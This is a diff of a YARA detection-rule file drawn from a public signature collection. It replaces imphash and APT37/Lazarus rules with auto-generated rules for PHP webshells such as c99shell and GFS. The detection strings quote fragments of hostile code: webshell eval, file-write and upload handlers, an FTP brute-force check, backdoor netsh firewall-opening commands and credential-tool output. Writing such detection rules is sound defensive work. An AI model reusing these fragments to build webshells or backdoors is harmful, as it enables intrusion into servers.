-		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "e4290fa6afc89d56616f34ebbd0b1f2c" or pe.imphash ( ) == "8abecba2211e61763c4c9ffcaa13369e" or pe.imphash ( ) == "a64e048b98d051ae6e6b6334f77c95d3" or pe.imphash ( ) == "359d89624a26d1e756c3e9d6782d6eb0" or pe.imphash ( ) == "c2a87fabf96470db507b2e6b43bd92eb" or pe.imphash ( ) == "62ec3dce1eba1b68f6a4511bb09f8c2c" or pe.imphash ( ) == "5662cfcdfd9da29cb429e7528d5af81e" or pe.imphash ( ) == "406c785a6e2c6970c1e8ed62877e197b" or pe.imphash ( ) == "dbf687d6aa2a6cafe4349f7b0821a792" or pe.imphash ( ) == "6dca3e9fb3928bbdb54dbce669943ec8" or pe.imphash ( ) == "f1a539a5b71ad53ac586f053145f08ec" or pe.imphash ( ) == "3a2003ea545fe942681da9e7683ebb58" or pe.imphash ( ) == "a8286b574ff850cd002ea6282d15aa40" or pe.imphash ( ) == "3c8577ca4bab2f95cc6fc73ef1895288" or pe.imphash ( ) == "84706849fa809feaa385711a628be029" or pe.imphash ( ) == "ba23a556ac1d6444f7f76feafd6c8867" or pe.imphash ( ) == "95e6f8741083e0c7d9a63d45e2472360" or pe.imphash ( ) == "774d797db707398fd2ef1979d02634d5" or pe.imphash ( ) == "8c16c795b57934183422be5f6df7d891" or pe.imphash ( ) == "98f67c550a7da65513e63ffd998f6b2e" or pe.imphash ( ) == "e836076a09dba03e4d6faa46dda0fefc" or pe.imphash ( ) == "ff63dc9c65eb25911a9bc535c8f06ad0" or pe.imphash ( ) == "08b67a9663d3a8c9505f3b2561bbdd1c" or pe.imphash ( ) == "135e92fc9902f3140f2e5a51458efdf0" or pe.imphash ( ) == "4753904c40d638a1bc745c65b88291d5" or pe.imphash ( ) == "0f44bf2b3b0b8d5ecae5689ff1d0e90d" or pe.imphash ( ) == "c4c9ecfc26ca516a80b8f6f5b2bdb7e6" or pe.imphash ( ) == "46ad3d954e527f769e37017b3e128039" or pe.imphash ( ) == "802dcac7aab948c19738ba3df9f356d9" or pe.imphash ( ) == "b36a21279375c40e6f4c1ea347f906de" or pe.imphash ( ) == "77a185e903c5527243ef219b003bfd38" or pe.imphash ( ) == "12a30b523ac71a3cbe9145c89400dd7f" or pe.imphash ( ) == "cc40fefa3af5cd00cc28dbd874038a4d" or pe.imphash ( ) == "3d8c26f4cb1782a87c3bb42796fb6b85" or pe.imphash ( ) == "2f4ddcfebbcad3bacadc879747151f6f" or pe.imphash ( ) == "76812f441b0ed9d3cc0748af25d689a3" or pe.imphash ( ) == "9a06f0024c1694774ae97311608bab5b" or pe.imphash ( ) == "481f47bbb2c9c21e108d65f52b04c448" or pe.imphash ( ) == "286870a926664a5129b8b68ed0d4a8eb" or pe.imphash ( ) == "a0db151d55761167d93eba72d3d94b32" or pe.imphash ( ) == "663243fe4d94e1304b265ce4011cd01b" or pe.imphash ( ) == "f24e64014af9015dc25262e5076fe61f" or pe.imphash ( ) == "b7d08302c927428e16a2ad8d18b9d2b7" or pe.imphash ( ) == "352063077f27a851dc2b08e15f08105e" or pe.imphash ( ) == "b0b97d1a91a2730b3daa8bbb2e86b402" or pe.imphash ( ) == "bc96f1c981700752dc2cf9553da99eb6" or pe.imphash ( ) == "f68ddef5f29b66bbd543e947c8743bb0" or pe.imphash ( ) == "6dfbc160505aa2f7205766eaa6fe72a1" or pe.imphash ( ) == "a202429ffe8d8c8b722572cffd5681a7" or pe.imphash ( ) == "342a3708d93b6b819b7b1a768201a747" or pe.imphash ( ) == "cdc00badc7162acde9bb032e793ac137" or pe.imphash ( ) == "be19e18d6a8b41631d40059031a928bb" or pe.imphash ( ) == "0c54f96a844b02689687407de9b6663e" or pe.imphash ( ) == "fa5f28e70130a452b7c0a51db5544ef9" or pe.imphash ( ) == "2e5708ae5fed0403e8117c645fb23e5b" or pe.imphash ( ) == "8d92fa1956a6a631c642190121740197" or pe.imphash ( ) == "dc73a9bd8de0fd640549c85ac4089b87" )
+		2 of them
 }
-
-rule SIGNATURE_BASE_SUSP_Imphash_Mar23_3 : FILE
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php
 {
 	meta:
-		description = "Detects imphash often found in malware samples (Maximum 0,25% hits with search for 'imphash:x p:0' on Virustotal) = 99,75% hits"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "eb91e700-6478-5085-a393-a7b342c0eb4f"
-		date = "2023-03-23"
-		modified = "2025-08-15"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_imphash_detection.yar#L297-L329"
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ee1fd555-f1bc-59a5-998c-f6098de8623e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5281-L5296"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b5296cf0eb22fba6e2f68d0c9de9ef7845f330f7c611a0d60007aa87e270c62a"
-		hash = "5a5a5f71c2270cea036cd408cde99f4ebf5e04a751c558650f5cb23279babe6d"
-		hash = "481b0d9759bfd209251eccb1848048ebbe7bd2c87c5914a894a5bffc0d1d67ff"
-		hash = "716ba6ea691d6a391daedf09ae1262f1dc1591df85292bff52ad76611666092d"
-		hash = "800d160736335aafab10503f7263f9af37a15db3e88e41082d50f68d0ad2dabd"
-		hash = "416155124784b3c374137befec9330cd56908e0e32c70312afa16f8220627a52"
-		hash = "21899e226502fe63b066c51d76869c4ec5dbd03570551cea657d1dd5c97e7070"
-		hash = "0461830e811d3831818dac5a67d4df736b4dc2e8fb185da439f9338bdb9f69c3"
-		hash = "773edc71d52361454156dfd802ebaba2bb97421ce9024a7798dcdee3da747112"
-		hash = "fe53b9d820adf3bcddf42976b8af1411e87d9dfd9aa479f12b2db50a5600f348"
-		logic_hash = "c7974beb40e973463a3ef9e8970194c8684f79c63811ece2d66fe446858283c2"
-		score = 45
+		logic_hash = "c089f8175532ddc0e2d256b4972f7db32683bd213a456622ed27ab4844d1e435"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+
+	strings:
+		$s0 = "<b>Dumped! Dump has been writed to "
+		$s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st"
+		$s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "afcdf79be1557326c854b6e20cb900a7" or pe.imphash ( ) == "fc6683d30d9f25244a50fd5357825e79" or pe.imphash ( ) == "2c5f2513605e48f2d8ea5440a870cb9e" or pe.imphash ( ) == "0b5552dccd9d0a834cea55c0c8fc05be" ) and pe.number_of_signatures == 0
+		1 of them
 }
-rule SIGNATURE_BASE_APT_NK_Lazarus_RC4_Loop : FILE
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_C99Php
 {
 	meta:
-		description = "Detects RC4 loop in Lazarus Group implant"
-		author = "f-secure "
-		id = "a9503795-b4b8-505e-a1bf-df64ec8c1c32"
-		date = "2020-06-10"
-		modified = "2023-12-05"
-		reference = "https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_aug20.yar#L2-L15"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5297-L5314"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b0e96bfff924a0c9b39e1ab03097ae0790743417d9da70917d64bc238905971e"
+		logic_hash = "e82882e89a1aeb256768f2af7a6d3674c89f9abc358710b33b8d3d425defcef1"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
 
 	strings:
-		$str_rc4_loop = { 41 FE 8? 00 01 00 00 45 0F B6 ?? 00 01 00 00 48
-                        FF C? 43 0F B6 0? ?? 41 00 8? 01 01 00 00 41 0F
-                        B6 ?? 01 01 00 00 }
+		$s0 = "@ini_set(\"highlight" fullword
+		$s1 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword
+		$s2 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword
 
 	condition:
-		int16 ( 0 ) == 0x5a4d and filesize < 3000KB and $str_rc4_loop
+		2 of them
 }
-rule SIGNATURE_BASE_APT_NK_Lazarus_Network_Backdoor_Unpacked : FILE
+rule SIGNATURE_BASE__GFS_Web_Shell_Ver_3_1_7___Priv8_Php_Nshell_Php_Php_Gfs_Sh_Php_Php
 {
 	meta:
-		description = "Detects unpacked variant of Lazarus Group network backdoor"
-		author = "f-secure"
-		id = "8eda9e74-1a19-5510-82d8-cd2eb324629c"
-		date = "2020-06-10"
-		modified = "2023-12-05"
-		reference = "https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_aug20.yar#L17-L41"
+		description = "Semi-Auto-generated  - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "4d1dd87b-1ffd-564d-9411-c5d2fc01ae0f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5315-L5330"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bfc3cf400eeea332e2e44b65f9728e94af0adde76b32ed4be527b25484f80745"
+		logic_hash = "9df5b6df25574b303044a0799c5eb5f38f9ebfbc6f6114275fe1e34adbde1f7c"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 85
+		tags = ""
+		super_rule = 1
+		hash0 = "be0f67f3e995517d18859ed57b4b4389"
+		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+		hash2 = "f618f41f7ebeb5e5076986a66593afd1"
 
 	strings:
-		$str_netsh_1 = "netsh firewall add portopening TCP %d" ascii wide nocase
-		$str_netsh_2 = "netsh firewall delete portopening TCP %d" ascii wide nocase
-		$str_mask_1 = "cmd.exe /c \"%s >> %s 2>&1\"" ascii wide
-		$str_mask_2 = "cmd.exe /c \"%s 2>> %s\"" ascii wide
-		$str_mask_3 = "%s\\%s\\%s" ascii wide
-		$str_other_1 = "perflog.dat" ascii wide nocase
-		$str_other_2 = "perflog.evt" ascii wide nocase
-		$str_other_3 = "cbstc.log" ascii wide nocase
-		$str_other_4 = "LdrGetProcedureAddress" ascii
-		$str_other_5 = "NtProtectVirtualMemory" ascii
+		$s2 = "echo $uname.\"</font><br><b>\";" fullword
+		$s3 = "while(!feof($f)) { $res.=fread($f,1024); }" fullword
+		$s4 = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()"
 
 	condition:
-		int16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $str_netsh* ) and 1 of ( $str_mask* ) and 1 of ( $str_other* )
+		2 of them
 }
-rule SIGNATURE_BASE_Hvs_APT37_Smb_Scanner : FILE
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Unknown smb login scanner used by APT37"
-		author = "Marc Stroebel"
-		id = "89a5cc32-f151-583d-823d-692de2c2b084"
-		date = "2020-12-15"
-		modified = "2023-12-05"
-		reference = "https://www.hybrid-analysis.com/sample/d16163526242508d6961f061aaffe3ae5321bd64d8ceb6b2788f1570757595fc?environmentId=2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec20.yar#L2-L29"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5331-L5349"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0bea71db7052f1c22c01cfbf710d4ed24651cbbd8b0fd29f09dfd49c4e314028"
+		logic_hash = "0f44dc1ff243b234a718e8dbd5cc8c4dc8eb9d3b63300a5c6ff72b86280607bf"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$s1 = "Scan.exe StartIP EndIP ThreadCount logfilePath [Username Password Deep]" fullword ascii
-		$s2 = "%s - %s:(Username - %s / Password - %s" fullword ascii
-		$s3 = "Load mpr.dll Error " fullword ascii
-		$s4 = "Load Netapi32.dll Error " fullword ascii
-		$s5 = "%s U/P not Correct! - %d" fullword ascii
-		$s6 = "GetNetWorkInfo Version 1.0" fullword wide
-		$s7 = "Hello World!" fullword wide
-		$s8 = "%s Error: %ld" fullword ascii
-		$s9 = "%s U/P Correct!" fullword ascii
-		$s10 = "%s --------" fullword ascii
-		$s11 = "%s%-30s%I64d" fullword ascii
-		$s12 = "%s%-30s(DIR)" fullword ascii
-		$s13 = "%04d-%02d-%02d %02d:%02d" fullword ascii
-		$s14 = "Share:              Local Path:                   Uses:   Descriptor:" fullword ascii
-		$s15 = "Share:              Type:                   Remark:" fullword ascii
+		$s0 = "c99ftpbrutecheck"
+		$s1 = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword
+		$s2 = "$fqb_lenght = $nixpwdperpage;" fullword
+		$s3 = "$sock = @ftp_connect($host,$port,$timeout);" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 10 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Hvs_APT37_Cred_Tool : FILE
+rule SIGNATURE_BASE__W_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_C99Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Unknown cred tool used by APT37"
-		author = "Markus Poelloth"
-		id = "e830025a-f2ac-55b1-aca3-ded9dba83a67"
-		date = "2020-12-15"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec20.yar#L31-L50"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5350-L5366"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4fb7247b88f2d252e7c9d5034c209945bc9e17f49de3dcdb5bf50b5afb302987"
+		logic_hash = "e9cd7425b806f71d8889f5df7f3fc2f4a692279fc4e495104646cfe28c5b5fe5"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash3 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$s1 = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>" fullword ascii
-		$s2 = "Domain Login" fullword ascii
-		$s3 = "IEShims_GetOriginatingThreadContext" fullword ascii
-		$s4 = " Type Descriptor'" fullword ascii
-		$s5 = "User: %s" fullword ascii
-		$s6 = "Pass: %s" fullword ascii
-		$s7 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
-		$s8 = "E@c:\\u" fullword ascii
+		$s0 = "$sqlquicklaunch[] = array(\""
+		$s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<"
 
 	condition:
-		filesize < 500KB and 7 of them
+		all of them
 }
-
-rule SIGNATURE_BASE_Hvs_APT37_RAT_Loader
+rule SIGNATURE_BASE__Antichat_Php_Php_Fatalshell_Php_Php_A_Gedit_Php_Php
 {
 	meta:
-		description = "BLINDINGCAN RAT loader named iconcash.db used by APT37"
-		author = "Marc Stroebel"
-		id = "6c3e8465-d607-59bf-85fc-5abbef71fb1c"
-		date = "2020-12-15"
-		modified = "2023-12-05"
-		reference = "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec20.yar#L52-L65"
+		description = "Semi-Auto-generated  - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "6bf5640f-0773-5d93-8d27-0844062017c7"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5367-L5383"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9"
-		logic_hash = "241f2683adc29e8aca30ae24278f3703fef0fed6b276dae488fdb32c167af1c9"
+		logic_hash = "789340845aeed4accaef02afa1a1fe420e73b6f5af1b621f4ec2342994045278"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "128e90b5e2df97e21e96d8e268cde7e3"
+		hash1 = "b15583f4eaad10a25ef53ab451a4a26d"
+		hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78"
+
+	strings:
+		$s0 = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword
+		$s1 = "if($action==\"phpeval\"){" fullword
+		$s2 = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword
+		$s3 = "$dir=getcwd().\"/\";" fullword
 
 	condition:
-		(pe.version_info [ "OriginalFilename" ] contains "MFC_DLL.dll" ) and ( pe.exports ( "SMain" ) and pe.exports ( "SMainW" ) )
+		2 of them
 }
-rule SIGNATURE_BASE_Hvs_APT37_Webshell_Img_Thumbs_Asp : FILE
+rule SIGNATURE_BASE__C99Shell_V1_0_Php_Php_C99Php_Sses_Php_Php
 {
 	meta:
-		description = "Webshell named img.asp, thumbs.asp or thumb.asp used by APT37"
-		author = "Moritz Oettle"
-		id = "e45d4507-81de-5f72-9ce2-4f0e3e5c62b1"
-		date = "2020-12-15"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec20.yar#L68-L95"
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5384-L5397"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "94d2448d3794ae3f29678a7337473d259b5cfd1c7f703fe53ee6c84dd10a48ef"
-		logic_hash = "58ccee11c08330c8cd4148e623a2e59e024d6d5f3067331dbdd962d0f6a8daa4"
+		logic_hash = "b2bdf4187ff3d63e4af5c70e8cc93cd8fac3257b33c38764ad2bb2e206066162"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
 
 	strings:
-		$s1 = "strMsg = \"E : F\"" fullword ascii
-		$s2 = "strMsg = \"S : \" & Len(fileData)" fullword ascii
-		$s3 = "Left(workDir, InStrRev(workDir, \"/\")) & \"video\""
-		$a1 = "Server.CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
-		$a2 = "Dim tmpPath, workDir" fullword ascii
-		$a3 = "Dim objFSO, objTextStream" fullword ascii
-		$a4 = "workDir = Request.ServerVariables(\"URL\")" fullword ascii
-		$a5 = "InStrRev(workDir, \"/\")" ascii
-		$g1 = "WriteFile = 0" fullword ascii
-		$g2 = "fileData = Request.Form(\"fp\")" fullword ascii
-		$g3 = "fileName = Request.Form(\"fr\")" fullword ascii
-		$g4 = "Err.Clear()" fullword ascii
-		$g5 = "Option Explicit" fullword ascii
+		$s3 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword
 
 	condition:
-		filesize < 2KB and ( ( 1 of ( $s* ) ) or ( 3 of ( $a* ) ) or ( 5 of ( $g* ) ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Hvs_APT37_Webshell_Template_Query_Asp : FILE
+rule SIGNATURE_BASE__Crystal_Php_Nshell_Php_Php_Load_Shell_Php_Php
 {
 	meta:
-		description = "Webshell named template-query.aspimg.asp used by APT37"
-		author = "Moritz Oettle"
-		id = "dc006b46-4c51-59cd-8b7d-adbfec86cd2e"
-		date = "2020-12-15"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec20.yar#L97-L120"
+		description = "Semi-Auto-generated  - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "a92134cd-7f10-589f-bcda-508bc7a20efe"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5398-L5413"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "961a66d01c86fa5982e0538215b17fb9fae2991331dfea812b8c031e2ceb0d90"
-		logic_hash = "d8bd017e9103bddb0b8a86effa8a4b0617b54bd643bcc36b6f678a3e60f8559f"
+		logic_hash = "71a9310b19b66e3699f75f551cc604f535ea843eb9c50f4a009edcd9c11e01b9"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		super_rule = 1
+		hash0 = "fdbf54d5bf3264eb1c4bff1fac548879"
+		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+		hash2 = "0c5d227f4aa76785e4760cdcff78a661"
 
 	strings:
-		$g1 = "server.scripttimeout=600" fullword ascii
-		$g2 = "response.buffer=true" fullword ascii
-		$g3 = "response.expires=-1" fullword ascii
-		$g4 = "session.timeout=600" fullword ascii
-		$a1 = "redhat hacker" ascii
-		$a2 = "want_pre.asp" ascii
-		$a3 = "vgo=\"admin\"" ascii
-		$a4 = "ywc=false" ascii
-		$s1 = "public  br,ygv,gbc,ydo,yka,wzd,sod,vmd" fullword ascii
+		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
+		$s1 = "$dires = $dires . $directory;" fullword
+		$s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword
 
 	condition:
-		filesize > 70KB and filesize < 200KB and ( ( 1 of ( $s* ) ) or ( 2 of ( $a* ) ) or ( 3 of ( $g* ) ) )
+		2 of them
 }
-rule SIGNATURE_BASE_Hvs_APT37_Webshell_Controllers_Asp : FILE
+rule SIGNATURE_BASE__Nst_Php_Php_Cybershell_Php_Php_Img_Php_Php_Nstview_Php_Php
 {
 	meta:
-		description = "Webshell named controllers.asp or inc-basket-offer.asp used by APT37"
-		author = "Moritz Oettle"
-		id = "82370415-30f4-514d-8806-e2daced96f07"
-		date = "2020-12-15"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec20.yar#L140-L218"
+		description = "Semi-Auto-generated  - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "cc4dc0e9-dbb1-560b-ae36-23d3e16a407f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5414-L5430"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "829462fc6d84aae04a962dfc919d0a392265fbf255eab399980d2b021e385517"
-		logic_hash = "a6e53e99f7500683d3b62a7630cecb53ee6c13b335cbf9912366675db964aefe"
+		logic_hash = "afc0b1c83644aa323d308471e5978b6b03f444f5f46fbaddac28ff42d524df1e"
 		score = 75
-		quality = 28
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 85
+		tags = ""
+		super_rule = 1
+		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
+		hash1 = "ef8828e0bc0641a655de3932199c0527"
+		hash2 = "17a07bb84e137b8aa60f87cd6bfab748"
+		hash3 = "4745d510fed4378e4b1730f56f25e569"
 
 	strings:
-		$s0 = "<%@Language=VBScript.Encode" ascii
-		$x1 = { 64 7F 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x2 = { 64 7F 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x3 = { 64 7F 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x4 = { 64 7F 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x5 = { 64 7F 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x6 = { 64 7F 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x7 = { 64 7F 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
